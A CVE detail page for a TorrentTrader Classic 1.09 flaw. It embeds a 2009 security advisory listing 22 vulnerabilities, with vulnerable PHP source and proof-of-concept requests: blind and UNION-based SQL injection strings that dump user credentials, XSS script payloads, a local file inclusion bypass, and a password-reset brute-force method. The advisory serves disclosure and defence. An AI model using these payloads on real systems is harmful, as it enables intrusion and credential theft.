CVE-2009-2158 Detail

CVE-2009-2158

Score / Severity

7.5

High

OWSAP

A02-Cryptographic Failures

EPSS

1.33%V3

Vector

Network

Published

2009-06-22
17h00 +00:00

Modified

2018-10-10
16h57 +00:00

Official links

CVE.org

NVD

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Notifications manage

List of Notifications

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Criteria applied when sending the alert: compared with the last alert sent + differences in CISA, EPSS, CVSS, CWE, Solutions, CPE.

Parameters

You can specify a title that will be retrieved in the alerts that will be sent out.

Specified here a CVE ID as CVE-2025-1234

Planning

Month

Next run calculation

Day

Weekday

Hour

Minute

Creation date

Last execution

Next execution

Functionality requiring a connection

This feature, which allows you to receive alerts, is only active when you are logged into your account.

CVE Descriptions

account-recover.php in TorrentTrader Classic 1.09 chooses random passwords from an insufficiently large set, which makes it easier for remote attackers to obtain a password via a brute-force attack.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-330	Use of Insufficiently Random Values The product uses insufficiently random numbers or values in a security context that depends on unpredictable numbers.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V3.1	7.5	HIGH	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N More informations Base: Exploitabilty Metrics The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component. Attack Vector This metric reflects the context by which vulnerability exploitation is possible. Network The vulnerable component is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). Attack Complexity This metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability. Low Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component. Privileges Required This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability. None The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack. User Interaction This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable component. None The vulnerable system can be exploited without interaction from any user. Base: Scope Metrics The Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope. Scope Formally, a security authority is a mechanism (e.g., an application, an operating system, firmware, a sandbox environment) that defines and enforces access control in terms of how certain subjects/actors (e.g., human users, processes) can access certain restricted objects/resources (e.g., files, CPU, memory) in a controlled manner. All the subjects and objects under the jurisdiction of a single security authority are considered to be under one security scope. If a vulnerability in a vulnerable component can affect a component which is in a different security scope than the vulnerable component, a Scope change occurs. Intuitively, whenever the impact of a vulnerability breaches a security/trust boundary and impacts components outside the security scope in which vulnerable component resides, a Scope change occurs. Unchanged An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority. Base: Impact Metrics The Impact metrics capture the effects of a successfully exploited vulnerability on the component that suffers the worst outcome that is most directly and predictably associated with the attack. Analysts should constrain impacts to a reasonable, final outcome which they are confident an attacker is able to achieve. Confidentiality Impact This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability. High There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server. Integrity Impact This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. None There is no loss of integrity within the impacted component. Availability Impact This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability. None There is no impact to availability within the impacted component. Temporal Metrics The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence in the description of a vulnerability. Environmental Metrics These metrics enable the analyst to customize the CVSS score depending on the importance of the affected IT asset to a user’s organization, measured in terms of Confidentiality, Integrity, and Availability.	[email protected]
V2	7.5		AV:N/AC:L/Au:N/C:P/I:P/A:P	[email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Exploit information

Exploit Database EDB-ID : 8958

Publication date : 2009-06-14 22h00 +00:00
Author : waraxe
EDB Verified : Yes

[waraxe-2009-SA#074] - Multiple Vulnerabilities in TorrentTrader Classic 1.09 =============================================================================== Author: Janek Vind "waraxe" Date: 15. June 2009 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-74.html Description of vulnerable software: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ TorrentTrader is a feature packed and highly customisable PHP/MySQL Based BitTorrent tracker. Featuring integrated forums and plenty of administration options. Please visit www.torrenttrader.org for the support forums. http://sourceforge.net/projects/torrenttrader List of found vulnerabilities =============================================================================== 1. Sql Injection vulnerability in "account-inbox.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Reasons: 1. unsanitized user submitted parameter "origmsg" is used in sql query Preconditions: 1. attacker must be logged in as valid user Test: http://localhost/torrenttrader109/account-inbox.php?msg=1&receiver=waraxe&origmsg=foobar&delete=yes Result: "MYSQL Error has occurred!" -----------------------------[source code start]------------------------------- if ($msg) { $msg = trim($msg); $res = mysql_query("SELECT id, acceptpms, notifs, email, UNIX_TIMESTAMP(last_access) as la FROM users WHERE username=".sqlesc($receiver).""); $user = mysql_fetch_assoc($res); if (!$user) $message = "Username not found."; ... if ($origmsg && $delete == "yes") mysql_query("DELETE FROM messages WHERE id=$origmsg") or sqlerr(); -----------------------------[source code end]--------------------------------- 2. Weak password generation algorithm in "account-recover.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Reasons: 1. generated password is weak and can be easily bruteforced Preconditions: 1. attacker must know email address associated with target's account Torrenttrader contains password reseting functionality: http://localhost/torrenttrader109/account-recover.php Anyone can initiate password reset, only condition is, that target's email address must be know. Torrenttrader will check email address and after successful validation new, temporal password will be generated and sent to that email address. Specific autogenerated password appears to be random number between 10000 and 50000, so basically there can be only 40000 possible temporal passwords. It's easy to write bruteforce script, which will try all possible password combinations. This process can take couple of hours or more, but eventually the password will be guessed and target account becomes compromised. -----------------------------[source code start]------------------------------- if ($HTTP_SERVER_VARS["REQUEST_METHOD"] == "POST") { $email = trim($_POST["email"]); if (!validemail($email)) { $msg = "" . NOT_VAILD_EMAIL . ""; $kind = "Error"; } else { $res = mysql_query("SELECT * FROM users WHERE email=" . sqlesc($email) . " LIMIT 1"); $arr = mysql_fetch_assoc($res); if (!$arr) { $msg = "" . EMAIL_INVALID . ""; $kind = "Error"; } ... if ($arr) { $newpassword = rand(10000, 50000); $md5pass = md5($newpassword); -----------------------------[source code end]--------------------------------- 3. Unauthorized database backup vulnerability in "backup-database.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Reasons: 1. missing access control Preconditions: 1. mysqldump utility must be available 2. gzip utility must be available 3. target directory must be writable 4. database name must be known in order to successfully guess archive filename Test: http://localhost/torrenttrader109/backup-database.php Resulting message: "Database backup successful, entry inserted into database." -----------------------------[source code start]------------------------------- system(sprintf( 'mysqldump --opt -h %s -u %s -p%s %s | gzip > %s/%s/%s-%s-%s-%s.gz', $host, $user, $pass, $db, getenv('DOCUMENT_ROOT'), $backupdir, $db, $day, $month, $year )); -----------------------------[source code end]--------------------------------- Attacker is able to create database backup and resulting "gz" archive's filename can be guessed, if attacker knows database name. This file is also directly downloadable from website. Example download URI: http://localhost/torrenttrader109/backups/torrenttrader109-10-06-2009.gz As result information leakage exists. For example, attacker can fetch admin credentials from backed up database. 4. Sql Injection vulnerability in "browse.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Reasons: 1. uninitialized variable "wherecatin" is used in sql query Preconditions: 1. none Test: http://localhost/torrenttrader109/browse.php?wherecatin=waraxe Result: Unknown column 'waraxe' in 'where clause' -----------------------------[source code start]------------------------------- if (count($wherecatina) > 1) $wherecatin = implode(",",$wherecatina); elseif (count($wherecatina) == 1) $wherea[] = "category = $wherecatina[0]"; ... if ($wherecatin) $where .= ($where ? " AND " : "") . "category IN(" . $wherecatin . ")"; if ($where != "") $where = "WHERE $where"; $res = mysql_query("SELECT COUNT(*) FROM torrents $where") or die(mysql_error()); -----------------------------[source code end]--------------------------------- This specific sql injection vulneraility can be exploited using blind attack methods. If there is one or more active torrents in database, then usable is attack pattern below: http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>1,1,2)=(SELECT+1 and we see found torrents. http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>50,1,2)=(SELECT+1 "No torrents were found based on your search criteria." In this way attacker is able to ask boolean questions from database and retrieve needed information bit by bit - example of classical blind sql injection. If there is no active torrents in database, then induced sql errors method can be used. http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>1,(SELECT 1 UNION ALL SELECT 1),2)=(SELECT+1 "Subquery returns more than 1 row" http://localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>50,(SELECT 1 UNION ALL SELECT 1),2)=(SELECT+1 "No torrents were found based on your search criteria." 5. Information leakage in "check.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Reasons: 1. missing access control Preconditions: 1. none Test: http://localhost/torrenttrader109/check.php This script is originally meant to be used by installer and lately by admins. Because of lacking access control attacker is able to use it for gathering some useful information about target system - full path to webroot, file and directory permissions of specific files, couple of php settings. 6. Sql Injection vulnerability in "delreq.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Reasons: 1. unsanitized user submitted parameter "categ" is used in sql query Preconditions: 1. attacker must have at least super moderator privileges (user class > 3) Comments: 1. very easy to exploit Test: http://localhost/torrenttrader109/delreq.php?categ=waraxe Result: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'waraxe order by requests.request LIMIT 0,50' at line 1 Test 2: http://localhost/torrenttrader109/delreq.php?categ=UNION+ALL+SELECT+1,2,3,4,5,username,password,email+FROM+users--+ and we can see all usernames, password hashes and emails from database. 7. Sql Injection vulnerability in "index.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Reasons: 1. unsanitized user submitted parameter "choice" is used in sql query Preconditions: 1. attacker must be logged in as valid user 2. there must exist at least one poll Testing needs custom written html form: ------------------------------------------------------------------------------- <html><body><center> <form action="http://localhost/torrenttrader109/index.php" method="post"> <input type="hidden" name="choice" value="waraxe"> <input type="submit" value="Test!"> </form></center></body></html> ------------------------------------------------------------------------------- Result: "MYSQL Error has occurred!" -----------------------------[source code start]------------------------------- if ($_SERVER["REQUEST_METHOD"] == "POST") { $choice = $_POST["choice"]; if ($CURUSER && $choice != "" && $choice < 256 && $choice == floor($choice)) { $res = mysql_query("SELECT * FROM polls ORDER BY added DESC LIMIT 1") or sqlerr(); $arr = mysql_fetch_assoc($res) or die("No poll"); $pollid = $arr["id"]; $userid = $CURUSER["id"]; $res = mysql_query("SELECT * FROM pollanswers WHERE pollid=$pollid && userid=$userid") or sqlerr(); $arr = mysql_fetch_assoc($res); if ($arr) die("Dupe vote"); mysql_query("INSERT INTO pollanswers VALUES(0, $pollid, $userid, $choice)") or sqlerr(); -----------------------------[source code end]--------------------------------- 8. Sql Injection vulnerability in "modrules.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Reasons: 1. unsanitized user submitted parameter "id" is used in sql query Preconditions: 1. attacker must have at least moderator privileges Testing needs custom written html form: ------------------------------------------------------------------------------- <html><body><center> <form action="http://localhost/torrenttrader109/modrules.php?act=edited" method="post"> <input type="hidden" name="title" value="test"> <input type="hidden" name="text" value="test"> <input type="hidden" name="public" value="yes"> <input type="hidden" name="class" value="0"> <input type="hidden" name="id" value="1"> <input type="submit" value="Test!"> </form></center></body></html> ------------------------------------------------------------------------------- Test result: "MYSQL Error has occurred!" -----------------------------[source code start]------------------------------- elseif ($_GET["act"]=="edited"){ $id = $_POST["id"]; $title = sqlesc($_POST["title"]); $text = sqlesc($_POST["text"]); $public = sqlesc($_POST["public"]); $class = sqlesc($_POST["class"]); mysql_query("update rules set title=$title, text=$text, public=$public, class=$class where id=$id") or sqlerr(__FILE__,__LINE__); -----------------------------[source code end]--------------------------------- 9. Information leakage in "phpinfo.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Reasons: 1. missing access control Preconditions: 1. none Test: http://localhost/torrenttrader109/phpinfo.php -----------------------------[source code start]------------------------------- <?php phpinfo(); ?> -----------------------------[source code end]--------------------------------- This script can be used by attacker to obtain information from php function phpinfo(). Access to such script must be limited to admins, but currently there is not any access control at all. 10. Sql Injection vulnerabilities in "report.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Reasons: 1. unsanitized user submitted parameter "user" is used in sql query 2. unsanitized user submitted parameter "torrent" is used in sql query 3. unsanitized user submitted parameter "forumid" is used in sql query 4. unsanitized user submitted parameter "forumpost" is used in sql query Preconditions: 1. attacker must be logged in as valid user Two proof-of-concept tests below are using parameter "user". Test 1 needs custom written html form: ------------------------------------------------------------------------------- <html><body><center> <form action="http://localhost/torrenttrader109/report.php" method="post"> <input type="hidden" name="reason" value="test"> <input type="hidden" name="user" value="0 UNION SELECT IF(LENGTH(@@version)>1,(SELECT 1 UNION ALL SELECT 1),1)-- "> <input type="submit" value="Test!"> </form></center></body></html> ------------------------------------------------------------------------------- Test result: "MYSQL Error has occurred!" Test 2 needs custom written html form: -----------------------------[source code start]------------------------------- <html><body><center> <form action="http://localhost/torrenttrader109/report.php" method="post"> <input type="hidden" name="reason" value="test"> <input type="hidden" name="user" value="0 UNION SELECT IF(LENGTH(@@version)>50,(SELECT 1 UNION ALL SELECT 1),1)-- "> <input type="submit" value="Test!"> </form></center></body></html> -----------------------------[source code end]--------------------------------- Test result: "You have already reported user ..." It's classical blind sql injection exploitation method and allows attacker to fetch information from database bit by bit by asking boolean questions. Other three sql injection vulnerabilities in "report.php" involve user submitted parameters "torrent", "forumid" and "forumpost" and exploitation can be done in similar way as seen above. 11. Sql Injection vulnerability in "take-deletepm.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Reasons: 1. unsanitized user submitted parameter "delmp" is used in sql query Preconditions: 1. attacker must have admin privileges -----------------------------[source code start]------------------------------- if(isset($_POST["delmp"])) { $do="DELETE FROM messages WHERE id IN (" . implode(", ", $_POST[delmp]) . ")"; $res=mysql_query($do) -----------------------------[source code end]--------------------------------- 12. Sql Injection vulnerability in "takedelreport.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Reasons: 1. unsanitized user submitted parameter "delreport" is used in sql query Preconditions: 1. attacker must have at least moderator privileges -----------------------------[source code start]------------------------------- jmodonly(); $res = mysql_query ("SELECT id FROM reports WHERE dealtwith=0 AND id IN (" . implode(", ", $_POST[delreport]) . ")"); -----------------------------[source code end]--------------------------------- 13. Sql Injection vulnerability in "takedelreq.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Reasons: 1. unsanitized user submitted parameter "delreq" is used in sql query Preconditions: 1. attacker must be logged in as valid user -----------------------------[source code start]------------------------------- if (get_user_class() > UC_JMODERATOR){ ... $do="DELETE FROM requests WHERE id IN (" . implode(", ", $_POST[delreq]) . ")"; $do2="DELETE FROM addedrequests WHERE requestid IN (" . implode(", ", $_POST[delreq]) . ")"; $res2=mysql_query($do2); $res=mysql_query($do); ... } else { foreach ($_POST[delreq] as $del_req){ $delete_ok = checkRequestOwnership($CURUSER[id],$del_req); if ($delete_ok){ $do="DELETE FROM requests WHERE id IN ($del_req)"; $do2="DELETE FROM addedrequests WHERE requestid IN ($del_req)"; ... function checkRequestOwnership ($user, $delete_req){ $query = mysql_query("SELECT * FROM requests WHERE userid=$user AND id = $delete_req") or sqlerr(); -----------------------------[source code end]--------------------------------- 14. Sql Injection vulnerability in "takestaffmess.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Reasons: 1. unsanitized user submitted parameter "clases" is used in sql query Preconditions: 1. attacker must have admin privileges -----------------------------[source code start]------------------------------- adminonly(); ... $updateset = $_POST['clases']; $query = mysql_query("SELECT id FROM users WHERE class IN (".implode(",", $updateset).")"); -----------------------------[source code end]--------------------------------- 15. Sql Injection vulnerability in "takewarndisable.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Reasons: 1. unsanitized user submitted parameter "warndisable" is used in sql query Preconditions: 1. attacker must have at least moderator privileges -----------------------------[source code start]------------------------------- jmodonly(); ... if ($disable != '') { $do="UPDATE users SET enabled='no' WHERE id IN (" . implode(", ", $_POST['warndisable']) . ")"; $res=mysql_query($do); } if ($enable != '') { $do = "UPDATE users SET enabled='yes' WHERE id IN (" . implode(", ", $_POST['warndisable']) . ")"; $res = mysql_query($do); } -----------------------------[source code end]--------------------------------- 16. Sql Injection vulnerability in "today.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Reasons: 1. uninitialized variable "limit" is used in sql query Preconditions: 1. none Comments: 1. seems hard to exploit Test: http://localhost/torrenttrader109/today.php?limit=waraxe Result: "Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in C:\apache_wwwroot\torrenttrader109\today.php on line 21" 17. Sql Injection vulnerability in "torrents-details.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Reasons: 1. uninitialized variable "where" is used in sql query Preconditions: 1. none -----------------------------[source code start]------------------------------- //speed mod $resSpeed = mysql_query("SELECT seeders,leechers FROM torrents WHERE $where visible='yes' and id = $id ORDER BY added DESC LIMIT 15") or sqlerr(__FILE__, __LINE__); -----------------------------[source code end]--------------------------------- Exploitation is possible using blind sql injection methods. Test 1: http://localhost/torrenttrader109/torrents-details.php?id=1& where=1=IF(LENGTH(@@version)>1,1,(SELECT+1+UNION+ALL+SELECT+1))--+ Result: normal page Test 2: http://localhost/torrenttrader109/torrents-details.php?id=1& where=1=IF(LENGTH(@@version)>50,1,(SELECT+1+UNION+ALL+SELECT+1))--+ Result: "MYSQL Error has occurred!" 18. Sql Injection vulnerability in "admin-delreq.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Reasons: 1. uninitialized variable "categ" is used in sql query Preconditions: 1. attacker must have at least moderator privileges -----------------------------[source code start]------------------------------- jmodonly(); ... $res=mysql_query("SELECT users.username, requests.filled, requests.filledby, requests.id, requests.userid, requests.request, requests.added, categories.name as cat FROM requests inner join categories on requests.cat = categories.id inner join users on requests.userid = users.id $categ order by requests.request $limit") or print(mysql_error()); -----------------------------[source code end]--------------------------------- Test: http://localhost/torrenttrader109/admin-delreq.php?categ=waraxe Result: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'waraxe order by requests.request LIMIT 0,50' at line 1" 19. Persistent XSS in "viewrequests.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Reasons: 1. unsanitized user submitted parameters used in response html generation Preconditions: 1. attacker must be logged in as valid user Steps for testing: a) attacker submits request: http://localhost/torrenttrader109/requests.php In "Title" field let's insert some javascript: testtitle<script>alert(123);</script> b) admin will browse requests: http://localhost/torrenttrader109/viewrequests.php and previously planted javascript will be executed in admin session context. 20. Persistent XSS in logging funtionality ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Reasons: 1. unsanitized user submitted parameters used in response html generation Preconditions: 1. attacker must be logged in as valid user Steps for testing: a) attacker uploads torrent file: http://localhost/torrenttrader109/torrents-upload.php In "Torrent Name" field let's insert some javascript: testname<script>alert(123);</script> Upload is successful: "The torrent has been uploaded successfully!" b) admin will browse logs: http://localhost/torrenttrader109/admin.php?act=view_log and previously planted javascript will be executed in admin session context. 21. Local File Inclusion vulnerability in "backend/admin-functions.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Reasons: 1. URI case-insensitivity on Windows platform Preconditions: 1. Windows platform 2. register_globals=on 3. magic_quotes_gpc=off -----------------------------[source code start]------------------------------- if (strpos($_SERVER['REQUEST_URI'], "admin-functions.php") !== false) die; require_once("./themes/" . $GLOBALS['ss_uri'] . "/block.php"); -----------------------------[source code end]--------------------------------- As we can see from source code snippet above, direct access to script is blocked. In case of Windows and Apache combination URI handling is case-insensitive. In other hand "strpos()" function, used for access control, is case-sensitive. So this script can be directly executed, if we change some characters in script's filename to uppercase: http://localhost/torrenttrader109/backend/Admin-functions.php "Warning: require_once(./themes//block.php) [function.require-once]: failed to open stream: No such file or directory in C:\apache_wwwroot\torrenttrader109\backend\admin-functions.php on line 3" If "register_globals=on" and "magic_quotes_gpc=off", then LFI is possible: http://localhost/torrenttrader109/backend/Admin-functions.php?ss_uri=../../banners.txt%00 22. Reflected XSS in multiple scripts ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Examples: http://localhost/torrenttrader109/themes/default/footer.php?ttversion=<script>alert(123);</script> http://localhost/torrenttrader109/themes/default/header.php?SITENAME="><script>alert(123);</script> http://localhost/torrenttrader109/themes/default/header.php?CURUSER[username]=<script>alert(123);</script> http://localhost/torrenttrader109/visitorstoday.php?todayactive=<script>alert(123);</script> http://localhost/torrenttrader109/visitorsnow.php?activepeople=<script>alert(123);</script> http://localhost/torrenttrader109/faq.php?faq_categ[999][title]=<script>alert(123);</script>&faq_categ[999][flag]=1 http://localhost/torrenttrader109/torrents-details.php?id=1&keepget="><script>alert(123);</script> Greetings: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Greets to ToXiC, y3dips, Sm0ke, Heintz, slimjim100, pexli, mge, str0ke, to all active waraxe.us forum members and to anyone else who know me! Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [email protected] Janek Vind "waraxe" Waraxe forum: http://www.waraxe.us/forums.html Personal homepage: http://www.janekvind.com/ ---------------------------------- [ EOF ] ------------------------------------ # milw0rm.com [2009-06-15]